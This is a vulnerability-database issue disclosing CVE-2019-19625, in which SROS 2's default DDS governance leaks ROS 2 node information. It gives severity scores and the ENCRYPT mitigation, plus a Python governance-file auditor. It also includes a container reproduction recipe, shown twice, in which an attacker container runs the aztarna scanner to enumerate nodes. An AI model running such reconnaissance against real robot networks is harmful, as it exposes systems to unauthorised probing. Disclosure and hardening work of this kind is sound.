aliasrobotics / RVD

Robot Vulnerability Database. An archive of robot vulnerabilities and bugs.
https://aliasrobotics.com
GNU General Public License v3.0

RVD#922: SROS2 leaks node information #922

Open vmayoral opened 4 years ago

vmayoral commented 4 years ago
cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools to generate and distribute keys for ROS
  2 and use the underlying security plugins of DDS from ROS 2 leak node information
  due to a leaky default configuration as indicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
  This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
  Further debugging the flaw indicates that there might be some additional underlying
  issues.
exploitation:
  description: A simple use of ros2cli allows one to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
    for a walkthrough.
  exploitation-image: Not available
  exploitation-vector: Not available
  exploitation-recipe:
    networks:
      - network:
        - driver: overlay
        - name: net1
        - encryption: true
        - subnet: 12.0.0.0/24

      - network:
        - driver: overlay
        - name: net2
        - encryption: false
        - subnet: 13.0.0.0/24

    containers:
      - container:
        - name: subject1
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - network: net1
      - container:
        - name: subject2
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
             - network: net1
      - container:
        - name: attacker
        - modules:
             - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
             - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
             - network:
                - net1
                - net2

    flow:
      - container:
        - name: subject1
        - window:
            - name: unsecure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=0"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
        - select: unsecure
      - container:
        - name: subject2
        - window:
            - name: secure
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "env | grep ROS"  # this shows there's no security enabled at this point
              - command: "ros2 run demo_nodes_cpp talker"
              - command: "export ROS_SECURITY_ENABLE=true"
              - command: "export ROS_SECURITY_STRATEGY=Enforce"
              - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
              - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
              - command: "env | grep ROS"  # from this point on, there's security enabled
              - command: "ros2 run demo_nodes_cpp talker"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "export ROS_DOMAIN_ID=1"
              - command: "cd /opt/ros2_ws/"
              - command: "mkdir policy"
              # generate a security policy based on our current graph
              - command: "ros2 security generate_policy policy/my_policy.xml"
              - command: "cat policy/my_policy.xml"
              # populate the keystore for all profiles
              - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
              - command: "kill -9 $(pidof talker)"
        - select: secure
      - container:
        - name: attacker
        - window:
            - name: attacker_window
            - commands:
              - command: "source /opt/ros2_ws/install/setup.bash"
              - command: "aztarna -t ros2 -d 0 --daemon -e"
              - split: horizontal
              - command: "source /opt/ros2_ws/install/setup.bash"
              - type: "aztarna -t ros2 -d 1 --daemon -e"
        - select: attacker_window
      - attach: subject2
flaw:
  application: any ROS 2 node communicating
  architectural-location: platform code
  date-detected: null
  date-reported: '2019-12-06'
  detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  detected-by-method: runtime detection
  issue: https://github.com/aliasrobotics/RVD/issues/922
  languages: Python
  package: sros2
  phase: runtime-operation
  reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
  reported-by-relationship: security researcher
  reproducibility: always
  reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
  reproduction-image: Not available
  specificity: ROS-specific
  subsystem: cognition:middleware
  trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
  date-mitigation: null
  description: Modify the policy and set rtps_protection_kind to ENCRYPT
  pull-request: https://github.com/ros2/sros2/pull/171
severity:
  cvss-score: 7.5
  cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  rvss-score: 6.5
  rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
  severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''
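To turn the mitigation into a check, here is an added example (not code from the RVD ticket or from the sros2 project): it parses a DDS Security governance document, reports every protection kind that is not an ENCRYPT variant, and rewrites rtps_protection_kind to ENCRYPT as the mitigation describes. The sample governance document is constructed here; that the leaky default was SIGN rather than ENCRYPT is an assumption, as are the function names.

```python
import xml.etree.ElementTree as ET

# Only the ENCRYPT variants hide RTPS payload and metadata from a passive
# observer on the same network; SIGN authenticates but leaves them readable.
ENCRYPTING = {"ENCRYPT", "ENCRYPT_WITH_ORIGIN_AUTHENTICATION"}

# Constructed sample in the DDS Security governance format; SIGN as the leaky default is an assumption.
WEAK_GOVERNANCE = """<dds><domain_access_rules><domain_rule>
  <domains><id_range><min>0</min><max>230</max></id_range></domains>
  <allow_unauthenticated_participants>false</allow_unauthenticated_participants>
  <enable_join_access_control>true</enable_join_access_control>
  <discovery_protection_kind>ENCRYPT</discovery_protection_kind>
  <liveliness_protection_kind>ENCRYPT</liveliness_protection_kind>
  <rtps_protection_kind>SIGN</rtps_protection_kind>
  <topic_access_rules><topic_rule>
    <topic_expression>*</topic_expression>
    <enable_discovery_protection>true</enable_discovery_protection>
    <enable_liveliness_protection>true</enable_liveliness_protection>
    <enable_read_access_control>true</enable_read_access_control>
    <enable_write_access_control>true</enable_write_access_control>
    <metadata_protection_kind>ENCRYPT</metadata_protection_kind>
    <data_protection_kind>ENCRYPT</data_protection_kind>
  </topic_rule></topic_access_rules>
</domain_rule></domain_access_rules></dds>"""

DOMAIN_KINDS = ("rtps_protection_kind", "discovery_protection_kind", "liveliness_protection_kind")
TOPIC_KINDS = ("metadata_protection_kind", "data_protection_kind")

def audit_governance(xml_text: str) -> list:
    """Return one finding per weak setting; an empty list means nothing to fix."""
    findings = []
    for i, rule in enumerate(ET.fromstring(xml_text).iter("domain_rule")):
        for tag in DOMAIN_KINDS:
            kind = rule.findtext(tag, "NONE").strip()  # a missing element behaves like NONE
            if kind not in ENCRYPTING:
                findings.append(f"domain_rule[{i}]/{tag}={kind}: set to ENCRYPT")
        for j, topic in enumerate(rule.iter("topic_rule")):
            for tag in TOPIC_KINDS:
                kind = topic.findtext(tag, "NONE").strip()
                if kind not in ENCRYPTING:
                    findings.append(f"domain_rule[{i}]/topic_rule[{j}]/{tag}={kind}: set to ENCRYPT")
    return findings

def harden(xml_text: str) -> str:
    """Apply the RVD#922 mitigation: force every rtps_protection_kind to ENCRYPT."""
    root = ET.fromstring(xml_text)
    for el in root.iter("rtps_protection_kind"):
        el.text = "ENCRYPT"
    return ET.tostring(root, encoding="unicode")
```

Running audit_governance over a deployed keystore's governance file before regenerating artifacts catches the leaky setting without having to observe the wire.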
vmayoral commented 4 years ago

Ticket updated, PR added.

vmayoral commented 4 years ago
alurity.yml file to reproduce sros2 leak:

```yaml
networks:
  - network:
    - driver: overlay
    - name: net1
    - encryption: true
    - subnet: 12.0.0.0/24

  - network:
    - driver: overlay
    - name: net2
    - encryption: false
    - subnet: 13.0.0.0/24

containers:
  - container:
    - name: subject1
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - network: net1
  - container:
    - name: subject2
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
         - network: net1
  - container:
    - name: attacker
    - modules:
         - base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
         - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
         - network:
            - net1
            - net2

flow:
  - container:
    - name: subject1
    - window:
        - name: unsecure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=0"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
    - select: unsecure
  - container:
    - name: subject2
    - window:
        - name: secure
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "env | grep ROS"  # this shows there's no security enabled at this point
          - command: "ros2 run demo_nodes_cpp talker"
          - command: "export ROS_SECURITY_ENABLE=true"
          - command: "export ROS_SECURITY_STRATEGY=Enforce"
          - command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
          - command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
          - command: "env | grep ROS"  # from this point on, there's security enabled
          - command: "ros2 run demo_nodes_cpp talker"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "export ROS_DOMAIN_ID=1"
          - command: "cd /opt/ros2_ws/"
          - command: "mkdir policy"
          # generate a security policy based on our current graph
          - command: "ros2 security generate_policy policy/my_policy.xml"
          - command: "cat policy/my_policy.xml"
          # populate the keystore for all profiles
          - command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
          - command: "kill -9 $(pidof talker)"
    - select: secure
  - container:
    - name: attacker
    - window:
        - name: attacker_window
        - commands:
          - command: "source /opt/ros2_ws/install/setup.bash"
          - command: "aztarna -t ros2 -d 0 --daemon -e"
          - split: horizontal
          - command: "source /opt/ros2_ws/install/setup.bash"
          - type: "aztarna -t ros2 -d 1 --daemon -e"
    - select: attacker_window
  - attach: subject2
```